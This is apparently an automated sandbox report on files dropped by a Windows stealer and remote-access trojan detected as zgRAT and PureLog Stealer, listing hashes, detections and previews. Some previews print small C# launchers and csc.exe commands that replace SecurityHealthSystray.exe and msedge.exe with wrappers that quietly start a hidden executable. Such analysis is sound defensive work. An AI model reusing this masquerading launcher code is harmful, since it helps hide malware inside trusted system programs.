                              SSDEEP:6:AAra9uyRvq+XEWhLiRnTVxR/ImMaVlaRs0qhEWnF+m9//kbPTaNBextKw8WHWxcY:AAgy+NRinX/I5esRs0AEVy/ygBYIraQH
                              MD5:278BD2271A21B01BEE6E0DDFF3518B17
                              SHA1:8188A2D3D4C78B86F1FE906E50A4D51DA8402B33
                              SHA-256:336C7CF8EF6A006D8D9AC9863ECF66196245614A22B246F5CD97AA56B5726C99
                              SHA-512:C8D8B49D627D625D1ABD6D5AA5CB58FFF25FAC68D154D351A56D52275EF7AF7E69AC29E7E3BE83B38D72E1E8F6C4981EFC2B818297259C0A235832E8D43CC63B
                              Malicious:false
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):1957888
                              Entropy (8bit):7.548545725494237
                              Encrypted:false
                              SSDEEP:24576:UaseMBOPMCPt3ZBngCi5OgpgPz3oOOMeqf3ocj7U45KQkBHiCXuKt7xiGRV:qNod2OgiPz3qMebcU4Et7MG
                              MD5:03EF05FF3B0C058220324C2CE72950F2
                              SHA1:1D82C1A36AD54002E93AB1665308343E8FBB3041
                              SHA-256:9D4430A9841B632DDFE2E41E4BA828A860194BC7A2B2F494655C2DB9841056C1
                              SHA-512:23C96AE50B2DA42FAB79D8BD0ABABC820E84A4A5C46473E916425C39AC4BB24FAEAF49FFC6D37B26D4E8B5E9BAB15D9951E6B1DCE12CBDF1C904930CA1B69772
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 66%
                              • Antivirus: Virustotal, Detection: 55%, Browse
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:ASCII text, with very long lines (845), with no line terminators
                              Category:dropped
                              Size (bytes):845
                              Entropy (8bit):5.897614772047287
                              Encrypted:false
                              SSDEEP:12:Cr42WpCrApUCl5glvZXzcet9oMPDeSdef8Yjz4sTW17bJEj+2+tazYMLegG:04UGqlBzt9rLSUYjz4d2+btkyx
                              MD5:ECBAAB294C165D0E25952251D1A8AF6E
                              SHA1:15F7DA23E33A613565F716EC0D01F4474A4216A5
                              SHA-256:B018C02EB84BED011EABAB1BB6D25CF277DBED9B7CDC5F69120C8BAE131AE404
                              SHA-512:B561897E467A566150788D183C05E71E4A036359649A7E404A09F9119E49F71F9B56FBEF8559238BA6C7D98C860E0160C23668A7DF1FEDB8059540F8339E1DE5
                              Malicious:false
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):1957888
                              Entropy (8bit):7.548545725494237
                              Encrypted:false
                              SSDEEP:24576:UaseMBOPMCPt3ZBngCi5OgpgPz3oOOMeqf3ocj7U45KQkBHiCXuKt7xiGRV:qNod2OgiPz3qMebcU4Et7MG
                              MD5:03EF05FF3B0C058220324C2CE72950F2
                              SHA1:1D82C1A36AD54002E93AB1665308343E8FBB3041
                              SHA-256:9D4430A9841B632DDFE2E41E4BA828A860194BC7A2B2F494655C2DB9841056C1
                              SHA-512:23C96AE50B2DA42FAB79D8BD0ABABC820E84A4A5C46473E916425C39AC4BB24FAEAF49FFC6D37B26D4E8B5E9BAB15D9951E6B1DCE12CBDF1C904930CA1B69772
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 66%
                              • Antivirus: Virustotal, Detection: 55%, Browse
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):248
                              Entropy (8bit):5.784020017648331
                              Encrypted:false
                              SSDEEP:6:m2Iq9YR3fBDBf0JosJsoZs34L/yZNmXpAK8eHwzvRF:m69M5Dd0lzs34L0yphjwzvr
                              MD5:3EAD95FD634626C32753A34629866057
                              SHA1:3E5ABE269E18EF4BCBAC064D5C16E3C90DBD4AEA
                              SHA-256:1CB6BC1DF5C79913CB8217FC2794522C1BB84F604B92A667A619943796CC95F1
                              SHA-512:D98407622A008DC7004F9AFDFBB9F5BAA91CB2283590CD2992CE3976608C8531CAB73B017201B96699D5C2B54F5166329C3D66C484803BF0F99F7B0B23342302
                              Malicious:false
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):1957888
                              Entropy (8bit):7.548545725494237
                              Encrypted:false
                              SSDEEP:24576:UaseMBOPMCPt3ZBngCi5OgpgPz3oOOMeqf3ocj7U45KQkBHiCXuKt7xiGRV:qNod2OgiPz3qMebcU4Et7MG
                              MD5:03EF05FF3B0C058220324C2CE72950F2
                              SHA1:1D82C1A36AD54002E93AB1665308343E8FBB3041
                              SHA-256:9D4430A9841B632DDFE2E41E4BA828A860194BC7A2B2F494655C2DB9841056C1
                              SHA-512:23C96AE50B2DA42FAB79D8BD0ABABC820E84A4A5C46473E916425C39AC4BB24FAEAF49FFC6D37B26D4E8B5E9BAB15D9951E6B1DCE12CBDF1C904930CA1B69772
                              Malicious:true
                              Yara Hits:
                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\dbg\conhost.exe, Author: Joe Security
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\dbg\conhost.exe, Author: Joe Security
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 66%
                              • Antivirus: Virustotal, Detection: 55%, Browse
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):1957888
                              Entropy (8bit):7.548545725494237
                              Encrypted:false
                              SSDEEP:24576:UaseMBOPMCPt3ZBngCi5OgpgPz3oOOMeqf3ocj7U45KQkBHiCXuKt7xiGRV:qNod2OgiPz3qMebcU4Et7MG
                              MD5:03EF05FF3B0C058220324C2CE72950F2
                              SHA1:1D82C1A36AD54002E93AB1665308343E8FBB3041
                              SHA-256:9D4430A9841B632DDFE2E41E4BA828A860194BC7A2B2F494655C2DB9841056C1
                              SHA-512:23C96AE50B2DA42FAB79D8BD0ABABC820E84A4A5C46473E916425C39AC4BB24FAEAF49FFC6D37B26D4E8B5E9BAB15D9951E6B1DCE12CBDF1C904930CA1B69772
                              Malicious:true
                              Yara Hits:
                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\OfficeClickToRun.exe, Author: Joe Security
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\OfficeClickToRun.exe, Author: Joe Security
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 66%
                              • Antivirus: Virustotal, Detection: 55%, Browse
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):279
                              Entropy (8bit):5.789804915950466
                              Encrypted:false
                              SSDEEP:6:ZWIIK5tOMcn1i4e51sLz68UKWczRGSwr0cghkktpNB8Wa1:ZRIocYsLDaU+rRghkk7b+
                              MD5:631C1C297D8462129BBDE3EFF97D1F14
                              SHA1:5B8A8E938394A95FC7792B19A3FB058E0B34A79C
                              SHA-256:8ED6065E580E092841C3D57F8BF45BA9D80C487216301192FF19A06C9B743CC7
                              SHA-512:3FBE75B22ED372A56E859637FC2FEF8DFB866019A0E90EB1E5A6C8D86CEFC193CDF0C81232E58B3EEE9098D48340DE1976D628FAA494C311AB3EE2B0F9839445
                              Malicious:false
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1396
                              Entropy (8bit):5.350961817021757
                              Encrypted:false
                              SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                              MD5:EBB3E33FCCEC5303477CB59FA0916A28
                              SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                              SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                              SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                              Malicious:false
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr
                              Process:C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe
                              File Type:CSV text
                              Category:dropped
                              Size (bytes):847
                              Entropy (8bit):5.354334472896228
                              Encrypted:false
                              SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                              MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                              SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                              SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                              SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                              Malicious:false
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                              Process:C:\ProgramData\dbg\conhost.exe
                              File Type:CSV text
                              Category:dropped
                              Size (bytes):847
                              Entropy (8bit):5.354334472896228
                              Encrypted:false
                              SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                              MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                              SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                              SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                              SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                              Malicious:false
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                              Category:dropped
                              Size (bytes):399
                              Entropy (8bit):5.0704572473988
                              Encrypted:false
                              SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6F2iFkD:JNVQIbSfhV7TiFkMSfhW9FkD
                              MD5:37A0B84917D71D1EF11083315F913710
                              SHA1:76818A79D610A293A73B85915ABD5DE59168F3E9
                              SHA-256:5CD621AE4DD8BAB430EEE66FDE975D0A972BA3E430757FB38BB062339A9C2316
                              SHA-512:67F3FA71431DBA6C2E04532A5B8CF13B1AB3E6554180D2B2AF16ABF435AD9C435F3B5EC434C5B5DE85C30D2B974F48E8D6248198FBAE3ED66565F6924BC4C65D
                              Malicious:false
                              Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe"); } catch { } }).Start();. }.}.
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                              Category:dropped
                              Size (bytes):251
                              Entropy (8bit):5.038845499831942
                              Encrypted:false
                              SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8o923fdwDV6XH:Hu7L//TRq79cQyOO
                              MD5:22EB239E00639A20B549DA27D5ACA969
                              SHA1:9A8B14507E8334B5E3153BD98522E1A8903170E5
                              SHA-256:A97AA71F31204ECBD2B9E4ECC763C929C8298E9F2EC8AFC72A670796A5022C70
                              SHA-512:01AB1DE251C031FFB66EFA5B6221C37D69078F1B860DACB97114287D556B6262ED64F4A47971430D1872500A35C91DDC1270CC9975C0530DA9B0952AD8C39CD0
                              Malicious:false
                              Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\00lep0eq\00lep0eq.0.cs"
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (319), with CRLF, CR line terminators
                              Category:modified
                              Size (bytes):740
                              Entropy (8bit):5.248154773834971
                              Encrypted:false
                              SSDEEP:12:UI/u7L//TRq79cQyOvKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:UI/un/Vq79tyOvKax5DqBVKVrdFAMBJj
                              MD5:1EEAF0A3E39204845A7C007B7914A298
                              SHA1:32109DD802A8BC467948E6AB645CB38913B2A4C4
                              SHA-256:C8F0333C4444ACEC6CB0C10BFA911FD8B14DEB70BB7F30FE71711CB6EADAC10F
                              SHA-512:980D3C8FC6C6073AC31BEB4E32D239C5C86316E74FA05762F26E904D561005EE88C0879077D2E57B1F392248BF0891492E7214ABEA6B3C5356B277BCC2140536
                              Malicious:false
                              Preview:.C:\FontHost> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\00lep0eq\00lep0eq.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                              Category:dropped
                              Size (bytes):414
                              Entropy (8bit):5.096435429200193
                              Encrypted:false
                              SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBL6F2iFkD:JNVQIbSfhWLzIiFkMSfhW9FkD
                              MD5:4E849CFD310597D236465DC35DF2D064
                              SHA1:8709065CA59891AF382D600EC037167FA24F384D
                              SHA-256:3FAC70C08D201963D7B24CAD027ABB5254553884EF22413202A15DD06FF82E18
                              SHA-512:AAC8137B60BA78302E5C95A0DBEF45CE1857E01458AAF56313FABAF5CCFACAB976A7FECF434D75CE059AA306EE6636D76E3A6FCB219EBCC12F8B0F7EC3853A04
                              Malicious:false
                              Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe"); } catch { } }).Start();. }.}.
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                              Category:dropped
                              Size (bytes):266
                              Entropy (8bit):5.12343787191325
                              Encrypted:false
                              SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8o923f9Bh5Lx:Hu7L//TRRzscQyFj3
                              MD5:A491C57956F3144A10B847DFB10AF606
                              SHA1:11943E508A4EFF63EF54BFA80BB937A95BECE8AF
                              SHA-256:81BB1F795F9102621746DA2AC0F045D9066E6EAA0D21EF4286A2B86BC8D1432C
                              SHA-512:20C7E14BC96F9A1AADD59E5A12DDEE6AB97BDA741F075556DF2218E64D612FB7A40E52287992A3F6BE66692AE8DD5B86D7428B1E8A7DCA0120BF5F4DDE04AC50
                              Malicious:true
                              Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.0.cs"
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (334), with CRLF, CR line terminators
                              Category:modified
                              Size (bytes):755
                              Entropy (8bit):5.25685794359289
                              Encrypted:false
                              SSDEEP:12:UI/u7L//TRRzscQyFj+KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:UI/un/VRzstyh+Kax5DqBVKVrdFAMBJj
                              MD5:8C092BBDC77512108837381FD0C45156
                              SHA1:F19A0640EF3079831DBA4FD6A7E2711384274944
                              SHA-256:6728339C705AF70A7AB94349B91DE064CEB50AA12D23EC0EF7BD5AD2C4138CF1
                              SHA-512:7D32CE3AB059FE1EF73B1E7D019F9B276E80EFD815E123005C454DE6A0E40CA7E3473F8451EC7895BF6CA7BBBBFA8EC082A01B2D126000494BC02CC63747B0DB
                              Malicious:false
                              Preview:.C:\FontHost> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                              Category:dropped
                              Size (bytes):106496
                              Entropy (8bit):1.136413900497188
                              Encrypted:false
                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                              MD5:429F49156428FD53EB06FC82088FD324
                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                              Malicious:false
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                              Category:dropped
                              Size (bytes):40960
                              Entropy (8bit):0.8553638852307782
                              Encrypted:false
                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                              MD5:28222628A3465C5F0D4B28F70F97F482
                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                              Malicious:false
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                              Category:dropped
                              Size (bytes):20480
                              Entropy (8bit):0.8439810553697228
                              Encrypted:false
                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                              Malicious:false
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                              Category:dropped
                              Size (bytes):98304
                              Entropy (8bit):0.08235737944063153
                              Encrypted:false
                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                              Malicious:false
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                              Category:dropped
                              Size (bytes):20480
                              Entropy (8bit):0.6732424250451717
                              Encrypted:false
                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                              Malicious:false
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                              Category:dropped
                              Size (bytes):196608
                              Entropy (8bit):1.121297215059106
                              Encrypted:false
                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                              MD5:D87270D0039ED3A5A72E7082EA71E305
                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                              Malicious:false
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                              Category:dropped
                              Size (bytes):20480
                              Entropy (8bit):0.5712781801655107
                              Encrypted:false
                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                              MD5:05A60B4620923FD5D53B9204391452AF
                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                              Malicious:false
                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6c4, 10 symbols, created Sun Aug 25 14:44:38 2024, 1st section name ".debug$S"
                              Category:dropped
                              Size (bytes):1916
                              Entropy (8bit):4.587617185240102
                              Encrypted:false
                              SSDEEP:24:HzLe9s6LzvDxuHyFwKRNSlmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+qcN:6Lz7wTKRslmuulB+hnqXSfbNtmhP
                              MD5:2BE51398921B96CC1D537E479D71FD7E
                              SHA1:A95244DEC6943AC78B8F7E22C96D9B6C1810F716
                              SHA-256:A6BA9CE2B4556BAC0D92D823C3503287920E36D40D59C75BD5D4394EA5D9DBC3
                              SHA-512:769BDFA106A484AA534A437C08E7D316B7047F910EC35D3A10652B09FFC3FBCF8F64DF996264C06606EBACB9F760051E189E8626014DBF2F06F18C2314B66434
                              Malicious:false
                              Preview:L...VC.f.............debug$S........L...................@..B.rsrc$01................x...........@..@.rsrc$02........8...................@..@........[....c:\Program Files (x86)\Microsoft\Edge\Application\CSC8B039BDD94094F1C8481C1D931E1DDC9.TMP....................q.QK.......N..........5.......C:\Users\user\AppData\Local\Temp\RES9C21.tmp.-.<....................a..Microsoft (R) CVTRES.S.=..cwd.C:\FontHost.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.
                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e0, 10 symbols, created Sun Aug 25 14:44:39 2024, 1st section name ".debug$S"
                              Category:dropped
                              Size (bytes):1944
